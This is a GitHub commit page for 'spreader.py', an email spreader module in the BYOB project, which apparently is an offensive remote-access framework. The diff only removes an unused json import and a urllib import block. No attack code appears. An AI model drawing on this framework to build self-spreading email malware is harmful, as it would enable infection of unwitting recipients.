Skip to content

Commit

Permalink
Bug fix in new email spreader module
Browse files Browse the repository at this point in the history
  • Loading branch information
malwaredllc committed Nov 7, 2018
1 parent c4120d2 commit a7df081
Showing 1 changed file with 0 additions and 7 deletions.
7 changes: 0 additions & 7 deletions byob/modules/spreader.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,6 @@
import os
import re
import sys
import json
import time
import email
import base64
Expand All @@ -14,12 +13,6 @@
import threading
import mimetypes

try:
from urllib.parse import urlencode, quote, unquote
from urllib.request import urlopen
except ImportError:
from urllib import urlencode, quote, unquote, urlopen

# globals
command = True
platforms = ['win32','darwin','linux2']
Expand Down

0 comments on commit a7df081

Please sign in to comment.